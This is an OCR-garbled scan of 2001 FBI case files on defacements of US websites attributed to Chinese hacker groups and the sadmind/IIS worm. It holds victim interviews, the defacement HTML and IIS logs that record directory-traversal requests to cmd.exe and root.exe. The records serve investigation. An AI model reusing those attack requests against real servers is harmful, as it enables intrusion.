websites gnhcc.com and newhavenchamber.com were defaced. ‘A copy 
of the logs is on the enclosed 3 1/2 disk. 


6) [___________|Greenfield Consulting Group, 274 
Riverside Avenue, Westport, Connecticut, (203) 221-0411 ext 
advised that. their website mail.greenfieldgqroup.com, had been 
defaced. A copy of the logs regarding the defacement is on the 
enclosed CD-R. 


7) Prmsoft, 999 Oronoque Lane, Stratford, 
Connecticut, advised that their website, 
prmsoft.com, ha een defaced. [ __|providea a copy of the logs 


regarding the defacement on the enclosed Zip disk. 


8) Americares, 161 Cherry Street, New 
Canaan, Connecticut, advised that their website, 


Amercares.org, had been defaced. A copy of the logs regarding 
the defacement is on the enclosed CD-R. 


9) Subway Inc., 325 Bic Drive, Milford, 
Connecticut, advsied that a computer they 
utilized at IP number 208.160.142.5 had been compromised and the 


b7C 
bTE 


b6 


i b7Cc 


ye 


b7c 


b6 


b7C 
a 


b6 
b7Cc 


— 
we 


we b6 


b7¢ 


To: i From“ New Haven @ 
Re: 05/25/2001 


web page defaced. A copy of the logs regarding the defacement is 


on the enclosed CD-R. 


10) Captain 
Milford, Connecticut, 
Milford's website had been defaced. 
the defacement. No logs were available. 


ford Police Department, 
advised that the city of 
provided a printout of 


No additional defacements have been reported to New 
Haven by Connecticut victims. If any further complaints are 


received they will be forwarded to Chicago. 


Any questions should be directed to SA 


[| (203) 503-5024. 


+4 


i 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 06/04/2001 


white male, date of birth 
Webmaster, Southwest Royalties Internet Service (SWRIS), 407 
79701, work telephone numbers of roy 
was interviewed at his place of 
employment by Special Agent After advising 


of the j of the interviewing agent and the nature of 

the interview, provided the following information. 
SWRIS began operations on 5/1/2001 and has a client base 
of approximately 30 businesses related to the oil and gas industry. 


According to SWRIS is Microsoft Windows driven, uses Cisco 
Routers, and has an ISA Server as part of their firewall setup. 


On 5/8/2001,[ ___—ijwas checking one of the SWRIS web 
Sites and discovered that the site had been replaced with the 
following: "FUCK USA GOVERNMENT!" "FUCK POISON BOX!" Once 
determined that the web site had been defaced, [____]| checked the 
log files and determined, based on the file stamp, that the 
defacement took place at 10:40 a.m. on 5/8/2001. caught and 
corrected the defacement at 11:00 a.m. on 5/8/2001. made a 
copy of the log files on to compact disc and a floppy disk. 
also printed a copy of the log file. 


Since the attack, [____]has received a great deal of 
ort scans. Additionally, upon further review of the SWRIS system, 
lees unable to determine whether the intrusion itself 
compromised any of the client data bases. 


5/14/2001 at Midland Texas 


Investigation on 


Date dictated 6/4/2001 


ns of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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b7c 


b6 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 06/04/2001 


white male, date of birth[ 
GeoSpectrum, Inc. (GSI), 214 West Texas Avenue, 
Suite 1000, Midland, Texas 79701, work telephone numbers of ase 


was interviewed at his place of employment by Specia 


Agent After advising of the j 
of the interviewing agent and the nature of the interview, 


provided the following information. 


According tol GSI is a small Internet Service 
Provider (ISP) that carries a client base of approximately 1000. 
GSI is an Oil related business that started an ISP as a division of 
the company. On approximately 5/4/2001, GSI began receiving 
complaints from system operators of multiple port scans on Port 
111. GSI technicians located and killed suspicious files. 
Additionally, GSI changed the root and passwords. On 5/6/2001, the 
complaints persisted and GSI isolated three network servers and 
implemented recovery of the "root" as the "root" was compromised. 
After the servers were isolated, GSI installed security upgrades. 
As part of the upgrades, GSI ordered a new Cisco Router, switch, 
and firewall. Additionally, GSI was operating with a Sun Solaris 
2.6 and upgraded the three servers to a Sun Solaris 8.0. i 
was unable to save any logs related to the intrusion and 
defacement. GSI technicians located two suspicious filenames 
associated with the attack. ‘The two filenames were "Sadminhack" 
and "Uniattack." 


at Midland, Texas 


Date dictated 6/4/2001 


SA 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/04/2001 
To: Counterterrorism Attn: NIP CLIU 
: —ar SSA Room 5965 63 
Chicago SA b6 
b7C 
From: El Paso DIE 
Midland RA 
Contact: SA (915) 570-0255 
Approved By: 
Drafted By: 
Case ID #: ending) 
Title: UNSUB(S); 
GeoSpectrum, Inc. - Victim; 
Southwest Royalties Internet Service - Victim; 
Impairment - Web Page Defacement 
Synopsis: Computer Intrusion and web page defacement of two (2) 
ISPs. : 
Enclosure(s): For CG, One (1) Compact Disc containing e-mail 
messages and log files and one (1) floppy disk containing lo 
files and printed log of intrusion into SWRIS, provided oa b6 


One (1) original and one (1) copy of FD-302 interview of b7c 
One_(1) original and one (1) copy of FD-302 
GSI. 


Detailei: Oni 5/14/2001 fi. GST, 
advised that GSI had to take down three servers due to an 
intrusion into the "root" and web page defacement. The intrusion 
into the "root" and the web page defacement took place between 
5/4/2001 and 5/6/2001. fees unable to provide any log 
information regarding the intrusion and the web page defacement. 
As a result of both, GSI has had to update their ISP security 
with both new hardware and software. 


On 2 ee advised b6 
that their system was compromised on 5/8/2001 with the defacement bic 
of several web pages. [was able_to repair the damage with 
very little down-time to the server. ee able to provide 
a compact disc containing the log files and e-mail messages. 

[Jaleo provided an additional floppy disk with log files. 


b6 
b7C 


_ © 
To: Counterterrorist From: El Paso 


Re: D] 06/04/2001 bs 
bITE 


poth[ can be reached at the ee 


following: 
Southwest Royalties Internet Service 


407 North Big Spring 
i x 1 


http: //www.swris.com 


214 West Texas Avenue, Suite 1000 
Midland, Texas 79701 


To: ee. From: El Paso @ 
re: [96/04/2001 


LEAD (s): 
Set Lead 1: (Adm) 
COUNTERTERRORISM 


AT WASHINGTON, DC 


Read and clear. 
Set Lead 2: (Adm) 
CHICAGO 


AT CHICAGO, ILLINOIS 


This information is provided to Chicago for any 
investigative action deemed appropriate. 


+¢ 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE , Date: 06/04/2001 
To: Chicago Attn: Squad al 
SA b3 
b6 
From: Memphis bic 
Squad 5 b7E 


Contact: sa[ sds (902) 747-9656 


Approved By: 


Drafted B 


Title: Subject: Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion . 
Date: 04/03/2001 


Synopsis: To report discontinuance of lead regarding defacements 
of First Tennessee Bank's Capital Markets web site. 


Administrative: Ref telcall between saf on May b6 
b7C 


8, 2001. 


Details: For information of Chicago, sa | __|was telephonically 
contacted by of the Corporate Security Division of 
‘First Tennessee Bank (FTB), Memphis, TN, during the first week of 
May, 2001, and advised that one of the bank's web sites 
(www.ftcem.com) had been defaced a couple of times since April 30, 
2001. Grissom mentioned that personnel in FTB's Data Security 
Division told him that person(s) responsible were the People's 
Republic of China. The statement placed on their web site was, 
"Fuck USA Government fuck PoizonBOx contact: 
sysadmin@yahoo.com.cn". 


On the afternoon of May 8, 2001, sas | or b6 
[fetes Coordinator) met with officials from , bic 
explained what information was needed (logs, IP 

addresses) to submit for the investigation. During this meeting 

it was learned that the bank had not done any IP traces and had 

not retrieved any information from log records. They had merely 

heard about recent intrusions by the Chinese and "assumed" this 

is what happened to their web site. SAs asked 

that FTB contact them when they obtained the log and/or other 

relevant information. 


b3 
b6 


Ket p2ec. _ ze 


‘To: Chicago From: Memphis 


b7E 
On May 29, 2001, SA[_ again contacted FTB to b6 
determine if they had obtained the requested information. b7c 


advised on May 31, 2001, that FTB's review of the log 
files found nothing of value. In fact, nothing at all was found 
on FTB's logs. It appears that this particular web site was set 
up outside of FTB's Data Security guidelines and that the Capital 
Markets web site only had the manufacturer provided event logging 
capabilities running at the time of the intrusions. 
could provide_nothing further regarding the previously reported 
intrusions. Po asi ceeed this incident had caused FTB to 
re-evaluate the security of their systems. 


Inasmuch as FTB is unable to provide the necessary logs 
and/or IP information to assist in an investigation at this time, 
Memphis is discontinuing the lead previously set by Chicago until 
such time as the appropriate information is received from FTB. 


To: Chicago From: Memphis 
re: D--06/04/2001. 


LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO DIVISION 


AT CHICAGO, IL 


Read and clear. 


+4 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 5/25/01 


provided the following information concerning an intrusion into a b7¢ 


PeopleSoft webpage on May 6, 2001: 


Subject: RE: logs etc 

Date: Thu, 24 May 2001 11:20:11 -0700 
From: 
To: 'S. 


b6 
b7Cc 
b7E 


-----BEGIN PGP SIGNED MESSAGE----- 


Hellol | 


No worries. The logs are actually quite trivial in size, only one of 
the machines had logging turned on. It's bassically just the IIS 
httpd log that will give you IP addresses of the machines that ran 
the worm against the host. The client didn't feel the need to 
encrypt them, so I guess sending them to you in the clear would be 
consistant with the client's wishes. The stuff is attached below. 


I contacted all the arin listed owners of the ip address that were 

not clients and were attacking the webservers. Of the 4 non-client 

IP addresses FBI agents had visted two. One was an ISP, the other is 
a research group. 


The most interesting entry in the logs is: 
2001-05-06 12:25:00 211.97.114.240 


That IP address belongs to: 
Unicom China 

911 Room,Xin Tong Center,No.8 Beijing Railway Station East Avenue, 
Beijing,PRC. 


Which is China's second largest phone company. Emails and calls to 
them were futile. 


Investigation on 5/25/01 

b3 
Date dictated 5/25/01 b6é 
b7C 
b7E 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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SSS 


Continuation of FD-302 of | | , On 5 / 25 / Ol , Page _#4. 


Cheers, 


[_] 


The logs referred to in the e-mail have been copied to a disk and 
are contained in a 1A envelope in the case file. 
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Cowplaint Form @ 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: [EX] Negative [J See below 


Subject's name and aliases Character of case 


Unknown COMPUTER INTRUSION 


Deckare 


Complaint received 


[] Personal [4 Telephonic Date 05/29/01 Time. 0930 


Address of Subject Complainant's address and telephone number 


dad SW, Canton, Ohio 


Sex 
Male 
fe Birth date and birth place 


Scars, marks and other data 


Employer Telephone 


Subject’s 
Description 


Vehicle Description 


Facts of Complaint 


telephonically contacted the Canton, Ohio office of 


the FBI regarding a_computer intrusion in which his company, Deckare, had 
fallen victim to. as that they noticed the hack on 


Sunday, May 6, 2001 at approximately midnight. The last 1 n to the 
web site by a Deckare employee was Friday, May 4, 2001. 
indicated that unsub(s) hacked into their web site, www.deckare.com, and 


SI a Ee ae ad 


posted the phrases "fuck USA Government" and "fuck PoizonBOx". The 
intruder's directed all responses to their hack to 
"sysadmcn@yahoo.com.cn". 


[_Jaavisea that thel | for Deckare is[ who is 


Omplamt received by) BLOCK STAMP 


(ROA RT Fan 
AGENT COPY. 


= ee @ 


employed by Netsolvers, telephone[ __—| email address 


netsolvers@neo.rr.com., 


b6 
b7Cc 


& May. 29 2081 11:52AM P4 


++ 3384786311 


®& PHONE NO. 


Wo'UI09 COYRA@)Uoupests:}9B Ud 


XO QuUOZIOg Yonyz 
JUSUIUISAOD WS yong 


DECKARE 


FROM : 


ie > MAY-24-2001 THU 01:33 PH “oe HEALTH FAK NO, “oe. 


file://Mweb/InetPub/wwwroothackindex.hum 


fuck USA Government 
fuck PoizonBOx 


contactisysadmen@yahoo.com.cn 


Page ] 


FAK NO, “oe P.-03 


; > MAY-24-2001 THU 01:33 PH — 


<html> 


<head> 
<meta name="Microsoft Theme’ content="behdl 100, defaulc'> 
«x/haad> 


<body> <or><br><br> <bre<bro <br><cable widths"100% "> 
ot 
atde<p aligaw( center"s<font siza="7" eolor='roed">fuck USA Government</font><tro<tdo<p 
align="canter"><font sica="7" color="red'>fuck PolzonBOx</font><tye><td><p align="center "*><font 
site:"4" solor="red">contact :sysadmen@yahoo. com. cn</font> 
</table> 


oe 
AU Alege as f 


Page J 


> 
Fen RBV. 3-27-95) 
Complaint Form 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: BX Negative L] See below 


Subject's name and aliases Character of case 


Unknown COMPUTER INTRUSION 


Canton Health Department 


Complaint received 


[] Personal [J] Telephonic Date 05/15/2001 Time_1:10 pm 


Address of Subject Complainant's address and oes number 


; 420 Market Aven 
People's Republic of China Canton, Ohio 


Complainant's DOB 


Age =— — Social Security Number 


Scars, marks and other data 


= 
2s 
3S 
o .E 
23 
nA Y 

Q 


Employer Address Telephone 


Vehicle Description 


Facts of Complaint 


telephonically contacted the Canton, Ohio office of the 
FBI regarding a computer intrusion in which the Canton Health Department 
had fallen victim to. On May 9, 2001, at approximately 7:01 p.m., 
unsub(s) hacked into and defaced the Health Department's web page as well 
as both_of the Department's mirror sites which are used as back-up web 
sites. advised that the unsub(s) had to access each page 
separately through firewalls. 


indicated that the file marked hackindex.htm was the file 


which replaced the Health Department's default home page while the file 
marked hackindex.asp was the underlying code that displays the hacked 


[| 
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page. Both files were found on the Health Department's server 
when it was hacked. The messages left on the web sites by the 
unsub(s) all stated "fuck USA Government" and "fuck PoizonBOx". 
The unsub(s) responsible for the intrusion directed the victim to 
direct all inquires concerning the intrusion to 


sysadmcn@yahoo. com.cn knew such an address to be that of b6 
the Chinese American office for www.yahoo.com The Health b7c 


Department suffered approximately $1000.00 in losses (labor and 
equipment) as a result of the intrusion. 


pe a that their main web site address is 
www.cantonhealth.orgq while the two back-up sites are 
www.members.tripod.com/bchd and www.members.tripod.com/BCHD 


respectively. 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/29/2001 
To: 2hicago attn: sal sd Pe 


Counterterrorism NIP b6 
b7E 


From: Cleveland 
Squad 10/Can 
Ss 


Drafted By: 


Case ID #: (Pending)| | 
Title: HACKER/HONKER UNION OF CHINA; 
ILLINOIS SECRETARY OF STATE-VICTIM; 
04/03/2001; 
COMPUTER INTRUSION . 


Synopsis: Forwarding of intelligence regarding web defacements. 


Enclosure(s): Enclosed for the Chicago Division are the 
following: 


1. A copy of the hacked web page (no logs available) 
for Deckare Services, 1501 Raff Road SW, Canton, Ohio. 


2. A copy of the hacked web page for the Canton Health 
Department, 420 Market Avenue North, Canton, Ohio as well as the 
corresponding logs for the attack. 


3. A co of an FD-71 Complaint Form received from 
[TE] canton Health Department. bs 
b7C 

: 4. A co of an FD-71 Complaint Form received from 


Details: For the information of the Chicago and Counterterrorism 
Divisions, the Canton RA, Cleveland Division, is in receipt of 
information from two local organizations who have been the victim 
of web defacements. The details of the computer intrusions seem 
to match those in captioned matter. 


Therefore, the enclosed FD-71's are being forwarded to 
the Chicago Division for incorporation into captioned matter. 


b3 
bT7E 
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To: Chicago From: Cleveland 7 

Re: [_} 05/29/2001 ba 


b7E 


LEAD (s): 
Set Lead 1: 
CHICAGO 
AT CHICAGO, ILLINOIS 
Read and clear. 
Set Lead 2: 
COUNTERTERRORISM 
AT WASHINGTON, DC 
Read and clear. 
+¢ 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/24/2001 

To: Chicago” Attn: sat —~d| b3 
b6 

From: Detroit b7c 


Squad C-12/ bTE 
Cc : SA 


Approved By 


Drafted By: af p1.ec) 


Case ID #: 


Title: Hacker/Honker Union of China; 
Chicago Systems Group - Victim 
Computer Intrusion 


04/03/01 
b3 


b7E 
UNSUB (S) ; 
Journal of Clinical Investigation - Victim; 
Computer Intrusion 


ees 


Synopsis: Forwarding all information pertaining to the use of 
the Sadminds/IIS worm against Journal of Clinical Investigation 
for Chicago’s coordination. Copy of information to Detroit 
Control file. 


Enclosures: For Chicago are: a 1-A envelope containing one (1) 
3.5" diskette with files obtained from victim; one FD-302 with 
attachments re interview with victim. For Detroit is one FD-302 
re victim interview. 


Details: On May 16, 2001,[___——————sd| Journal of Clinical b6 
Investigation, 35 Research Dr, Suite 300, Ann Arbor, Michigan, b7C 
contacted the Ann Arbor FBI to advise of a compromise of their 
web server. Following an interview with cheix[ 

it was evident that Their systems 
had experienced the Sadminds/IIS worm. Pertinent files and logs 
were obtained. 


saL___] is forwarding all pertinent information re the 
attack on the Journal of Clinical Investigation to captioned 
Chicago case, as well as a copy to the Detroit control file. 


b3 
bT7E 
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TOs j a DELYOLE 
: Re: 05/24/2001 pe 
b7E 


LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO 
AT. CHICAGO 


Read and clear. 
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FD-302 (Rev. 10-6-95) 
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FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/30/01 


Oni Mey 25 200dy |e = 


for the Journal of Clinical Investigation, 35 Res h Drive, 
Suite 3200, Ann Arbor, Michigan, (734) 222-6050 was advised 
of the interviewing agent’s identity and the purpose of the 
interview, and provided the following information: 


advised that he discovered that their website, 
"www.the-jci.org", was altered on the morning of Monday, May 7, 
2001. He immediately took their server offline and checked the 
IIS log files. He discovered some log entries that looked 
suspicious, but since his logging was set to "abbreviated", he 
could not display the entire command string to determine exactly 
what had happened. 


checked the dates on some files and noticed 
that the "index.html", "index.asp", "default.html", and 
"default.asp" files had May 6, 2001 dates. He also found that 
the "roots.exe" file had been moved to another directory. 


finished by stating that the IP address for the 
server is 63.146.80.3, that there was no firewall protecting the 
server, and they were running MicroSoft Windows NT, version 5, 
unknown update level. 


ae copies of the altered files listed 
above, as we as log files for May 5, 6, and 7, on a 3.5" 
diskette. This diskette has been placed in the 1-A section of 
this file. 


Attached and made part hereto is a copy of the altered 
"index.html" file, as well as the May 5, 6, and 7 log files. 


Investigation on 05/25/01 at Ann Arbor, Michigan 


File # Date dictated 


by 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
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b6 
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#Software: 
#Version: 
#Date: 2001-05-06 14:42: 


#Fields: 
14:42:19 
200 

14:42:19 


14:42:19 


1.,,0 


19 


~ 


Microsoft Internet Information Server 4.0 


time c-ip cs-method cs-uri-stem sc-status 
114.240 GET 


211.97 


211.97. 
211.97. 
211.97. 


211.97. 
211.97. 


211.97 
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211.97. 
211.97. 
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211.97. 
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211.97. 
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211.97.. 
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211.97. 
211.97. 
211.97. 
211.97. 
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211.97. 
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211.97 


211.97. 
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114 
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240 


-240 
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-240 
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»240 
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- 240 
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- 240 


240 


-240 
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.240 


240 


- 240 
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240 
240 


114.240 GET 


GET 


GET 
GET 
GET 
GET 
GET 


GET 
GET 
GET 
GET 
GET 


GET 
GET 
GET 
GET 
GET 


GET 
GET 
GET 
GET 
GET 


GET 
GET 
GET 
GET 
GET 


GET 
GET 
GET 
GET 
GET 


GET 
GET 
GET 
GET 
GET 


GET 
GET 
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/scripts/root. 
/scripts/root. 
/scripts/root. 
/scripts/root. 
/scripts/../. 


/scripts/root. 
/scripts/root. 
/scripts/root. 
/scripts/root. 
/scripts/../. 


/scripts/root. 
/scripts/root. 
/scripts/root. 
/sceripts/root. 
/scripts/../. 


/scripts/root. 
/scripts/root. 
/scripts/root. 
/scripts/root. 
/scripts/../. 


/seripts/root. 
/scripts/root. 
/scripts/root. 
/scripts/root. 
/seripts/../. 


/scripts/root. 
/scripts/root. 
/sceripts/root. 
/scripts/root. 
PBECLIDESY 2/2 


/seripts/root. 
/scripts/root. 
/scripts/root. 
/scripts/root. 
/SCLIpts/ s'./ 


/scripts/root. 
/seripts/root. 


/winnt/system32/cmd. 
/winnt/system32/cmd. 


/winnt/system32/cmd. 


exe 502 
exe 502 
exe 502 
exe 502 


./winnt/system32/cemd. 


exe 502 
exe 502 
exe 502 
exe 502 


./winnt/system32/cmd. 


exe 502 
exe 502 
exe 502 
exe 502 


./winnt/system32/cmd. 


exe 502 
exe 502 
exe 502 
exe 502 


./winnt/system32/cmd. 


exe 502 
exe 502 
exe 502 
exe 502 


./winnt/system32/cmd. 


exe 502 
exe 502 
exe 502 
exe 502 


./winnt/system32/cmd. 


exe 502 
exe 502 
exe 502 
exe 502 


./winnt/system32/cmd. 


exe 502 
exe 502 


exe 


exe 


exe 


exe 


exe 


exe 


exe 


exe 


exe 


exe 
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211. 
211. 
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216. 
216. 
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216. 
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.240 


-240 
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GET 
GET 
GET 
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GET 
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GET 
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GET 
GET 
GET 
GET 
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GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 


/seripts/root. 
/scripts/root. 
./winnt/system32/cmd. 


/scripts/../. 


/scripts/../. 


/seripts/root. 
/scripts/root. 
/seripts/root. 
/scripts/root. 
./winnt/system32/cemd. 


/scripts/../. 


/scripts/root. 
/scripts/root. 
/scripts/root. 
/scripts/root. 
./winnt/system32/cmd. 


/seripts/../. 


/scripts/root. 
/scripts/root. 
/scripts/root. 
/scripts/root. 
./winnt/system32/cmd. 


/seripts/../. 


/scripts/root. 
/seripts/root. 
/scripts/root. 
/scripts/root. 


exe 502 
exe 502 


./winnt/system32/cmd. 


exe 502 
exe 502 
exe 502 
exe 502 


exe 502 
exe 502 
exe 502 
exe 502 


502 
502 
502 
502 


exe 
exe 
exe 
exe 


exe 502 
exe 502 
exe 502 
exe 502 


exe 


exe 


exe 


exe 


exe 


/sceripts/../../winnt/system32/cmd.exe 
502 
502 
502 


502 


/scripts/root. 
/scripts/root.exe 
/scripts/root.exe 
/scripts/root.exe 
/Default.htm 200 
/exchange/USA/Default.htm 200 
/exchange/USA/logon.asp 200 _ 
/exchange/USA/back.jpg 200 
/exchange/USA/part2.gif 200 
/exchange/USA/part1.gif 200 
/exchange/USA/msie.gif 200 
/exchange/USA/msprod.gif 200 
/exchange/USA/LogonFrm.asp 401 
/exchange/USA/LogonFrm.asp 302 
/exchange/USA/root.asp 200 
/exchange/USA/Navbar/nbInbox.asp 200 
/exchange/USA/inbox/main_fr.asp 200 
/exchange/USA/Navbar/inbox.gif 200 
/exchange/USA/Navbar/finduser.gif 200 
/exchange/USA/Navbar/cal.gif 200 
/exchange/USA/Navbar/public.gif 200 
/exchange/USA/Navbar/logoff.gif 200 
/exchange/USA/Navbar/option.gif 200 
/exchange/USA/inbox/title.asp 200 


exe 


15:47:49 216.93.48.226 GET /exchange/USA/inbox/peerfldr.asp 200 
15:47:49 216.93.48.226 GET /exchange/USA/inbox/commands.asp 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/newmail.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/divider.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/newpost.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/inbox/messages.asp 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/inbox.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/delfoldr.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/upone.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/mark.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/inbox/urgent.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/mffav.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/arwtanrt.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/newfoldr.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/movepy.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/delmsg.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/inbox/papclip.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/inbox/flagcomp.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/empfldr.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/help.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/arwtanlf.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/inbox/envelope.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/papclip.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/refresh.gif 200 
15:47:51 216.93.48.226 GET /exchange/USA/images/envelope.gif 200 
15:48:08 216.93.48.226 GET 
/exchange/USA/forms/IPM/NOTE/frmRoot.asp 302 

15:48:08 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 


15:48:08 216.93.48.226 GET /exchange/USA/forms/reply.gif 200 
15:48:08 216.93.48.226 GET /exchange/USA/forms/forward.gif 200 
15:48:08 216.93.48.226 GET /exchange/USA/forms/ReplyFld.gif 200 
15:48:08 216.93.48.226 GET /exchange/USA/forms/replyall.gif 200 
15:48:08 216.93.48.226 GET /exchange/USA/forms/delmark.gif 200 
15:48:08 216.93.48.226 GET /exchange/USA/forms/prevmsg.gif 200 
15:48:08 216.93.48.226 GET /exchange/USA/forms/nextmsg.gif 200 
15:48:08 216.93.48.226 GET /exchange/USA/forms/movepy.gif 200 
15:48:16 216.93.48.226 GET 
/exchange/USA/forms/IPM/NOTE/frmRoot.asp 302 

15:48:16 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 
200 

15:48:32 216.93.48.226 GET 
/exchange/USA/forms/IPM/NOTE/frmRoot.asp 302 

15:48:32 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 
200 

15:48:46 216.93.48.226 GET /exchange/USA/inbox/messages.asp 200 
15:48:52 216.93.48.226 GET 
/exchange/USA/forms/IPM/NOTE/frmRoot.asp 302 

15:48:52 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 
200 

15:49:05 216.93.48.226 GET 
/exchange/USA/forms/IPM/NOTE/frmRoot.asp 302 

15:49:05 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 
200 


15:49:56 216.93.48.226 GET /exchange/USA/inbox/messages.asp 200 
15:49:56 216.93.48.226 GET /exchange/USA/images/urgent.gif 200 
15:50:11 216.93.48.226 GET 
/exchange/USA/forms/IPM/NOTE/frmRoot.asp 302 

15:50:11 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 
200 

15:50:17 216.93.48.226 GET 
/exchange/USA/forms/IPM/NOTE/commands.asp 200 

15:50:28 216.93.48.226 GET /exchange/USA/inbox/messages.asp 200 
15:50:33 216.93.48.226 GET /exchange/USA/inbox/messages.asp 200 
15:50:33 216.93.48.226 GET /exchange/USA/inbox/messages.asp 200 
15:50:37 216.93.48.226 GET 
/exchange/USA/forms/IPM/NOTE/£rmRoot.asp 302 

15:50:37 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 
200 

-15:50:43 216.93.48.226 GET 
/exchange/USA/forms/IPM/NOTE/frmRoot.asp 302 

15:50:43 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 
200 

15:51:04 216.93.48.226 GET 
/exchange/USA/forms/IPM/NOTE/frmRoot.asp 302 

15:51:04 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 
200 

15:52:20 216.93.48.226 GET /exchange/USA/inbox/messages.asp 200 
15:52:35 216.93.48.226 GET 
/exchange/USA/forms/IPM/NOTE/frmRoot.asp 302 

15:52:35 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 
200 

15:53:16 216.93.48.226 GET /exchange/USA/logoff.asp 200 
15:53:16 216.93.48.226 GET /exchange/USA/msie.gif 200 

15:53:16 216.93.48.226 GET /exchange/USA/msprod.gif 200 
17:39:41 24.30.89.109 GET /exchange/USA/logon.asp 200 

17:39:41 24.30.89.109 GET /exchange/USA/part1.gif 200 

17:39:41 24.30.89.109 GET /exchange/USA/back.jpg 200 

17:39:41 24.30.89.109 GET /exchange/USA/part2.gif 200 

17:39:45 24.30.89.109 GET /exchange/USA/msie.gif 200 

17:39:45 24.30.89.109 GET /exchange/USA/LogonFrm.asp 401 
17:39:51 24.30.89.109 GET /exchange/USA/msprod.gif 200 

17:39:51 24.30.89.109 GET /exchange/USA/LogonFrm.asp 302 
17:39:51 24.30.89.109 GET /exchange/USA/root.asp 200 

17:39:51 24.30.89.109 GET /exchange/USA/Navbar/nbInbox.asp 200 
17:39:51 24.30.89.109 GET /exchange/USA/inbox/main_fr.asp 200 
17:39:51 24.30.89.109 GET /exchange/USA/Navbar/inbox.gif 200 
17:39:51 24.30.89.109 GET /exchange/USA/Navbar/cal.gif 200 
17:39:51 24.30.89.109 GET /exchange/USA/Navbar/finduser.gif 200 
17:39:53 24.30.89.109 GET /exchange/USA/Navbar/public.gif 200 
17:39:53 24.30.89.109 GET /exchange/USA/Navbar/option.gif 200 
17:39:53 24.30.89.109 GET /exchange/USA/inbox/title.asp 200 
17:39:53 24.30.89.109 GET /exchange/USA/Navbar/logoff.gif 200 
17:39:53 24.30.89.109 GET /exchange/USA/inbox/peerfldr.asp 200 
17:39:53 24.30.89.109 GET /exchange/USA/inbox/messages.asp 200 
17:39:53 24.30.89.109 GET /exchange/USA/inbox/commands.asp 200 
17:39:53 24.30.89.109 GET /exchange/USA/images/divider.gif 200 
17:39:53 24.30.89.109 GET /exchange/USA/images/newmail.gif 200 
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/exchange/USA/images/newpost.gif 200 
/exchange/USA/images/refresh.gif 200 
/exchange/USA/images/movepy.gif 200 
/exchange/USA/images/delmsg.gif 200 
/exchange/USA/images/newfoldr.gif 200 
/exchange/USA/images/delfoldr.gif 200 
/exchange/USA/images/empfldr.gif 200 
/exchange/USA/images/mffav.gif 200 
/exchange/USA/images/arwtanlf.gif 200 
/exchange/USA/images/arwtanrt.gif 200 
/exchange/USA/images/help.gif 200 
/exchange/USA/images/upone.gif 200 
/exchange/USA/images/inbox.gif 200 
/exchange/USA/images/folder.gif 200 
/exchange/USA/images/mark.gif 200 
/exchange/USA/inbox/urgent.gif 200 
/exchange/USA/inbox/envelope.gif 200 
/exchange/USA/inbox/papclip.gif 200 
/exchange/USA/images/envelope.gif 200 
/exchange/USA/inbox/commands.asp 200 
/exchange/USA/images/papclip.gif 200 
/exchange/USA/inbox/peerfldr.asp 200 
/exchange/USA/inbox/title.asp 200 
/exchange/USA/inbox/messages.asp 200 
/exchange/USA/images/mailbox.gif 200 
/exchange/USA/images/calendar.gif 200 
/exchange/USA/images/deleted.gif 200 
/exchange/USA/images/outbox.gif 200 
/exchange/USA/inbox/commands.asp 200 
